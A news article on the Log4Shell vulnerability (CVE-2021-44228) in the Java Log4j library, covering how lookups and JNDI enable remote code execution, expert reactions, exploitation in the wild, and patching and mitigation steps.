A new vulnerability sent shockwaves across the internet over the weekend, sending IT teams scrambling to fix Java servers before they are exploited by ruthless attackers looking for an easy foothold into systems.
It’s colloquially called Log4Shell and one security expert has said it could be “the single biggest vulnerability in the history of modern computing”.
The vulnerability sits within Java logging library Log4j which, when not causing a global cyber security panic, is simply meant to record information about a program on disk for monitoring and debugging.
Except this version of Log4j could be easily tricked into providing sensitive data or running malicious external code thanks to the library’s ‘lookups’ feature which replaces sequences like ‘${this}’ with data from elsewhere on a server.
Combined with the Java Naming and Directory Interface (JNDI), Log4j lookups can be used by bad actors to make network connections and remotely execute code.
The list of vendors whose products were potentially affected is massive and the US National Vulnerability Database gave Jog4Shell – or CVE-2021-44228 by its technical name – the maximum severity score of 10/10.
The Australian Cyber Security Centre (ACSC) warned on Monday that attackers have been actively scanning ports for vulnerable servers.
Servers of extremely popular video game Minecraft were vulnerable to these attacks simply by sending a message in the game's chat box.
Amit Yoran CEO of security firm Tenable described it as “the most critical vulnerability of the last decade”.
“When all of the research is done, we may in fact learn that it is the single biggest vulnerability in the history of modern computing,” he said.
“While details are still emerging, we encourage organisations to update their security controls, assume they have been compromised and activate existing incident response plans.
“The number one priority now is to work with your in-house information security and engineering teams or partner with an organisation that conducts incident response to identify the impact to your business.”
Log4j is in many ways the perfect storm of security flaws: it’s part of a commonly used library, is relatively easy to execute, and it was being exploited long before public disclosure.
Matthew Prince CEO of Cloudflare said the earliest evidence his company had seen of Log4j exploits was 1 December.
“That suggests it was in the wild at least nine days before publicly disclosed,” he tweeted.
“However, don’t [sic] see evidence of mass exploitation until after public disclosure.”
Within hours of the vulnerability being made public, researchers were seeing it being used to drop malicious software like cryptominers onto unsuspecting machines.
The Randori Attack Team, which runs offensive security operations, warned that security professionals should stay vigilant as the downstream impact of Log4Shell is “difficult to quantify” given the widespread use of Java in enterprise settings.
“We believe there will be an increasing number of vulnerable products discovered in the weeks to come,” the Randori Attack Team said.
“Due to the ease of exploitation and the breadth of applicability, we suspect ransomware actors to begin leveraging this vulnerability immediately.”
Mitigation steps are relatively straightforward: upgrade to Log4j version 2.15.0 and check for indicators of compromise.
But if patching isn’t an option right away, administrators can disable lookups in Log4j through either the system property log4j2.formatMsgNoLookups or by setting the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true.
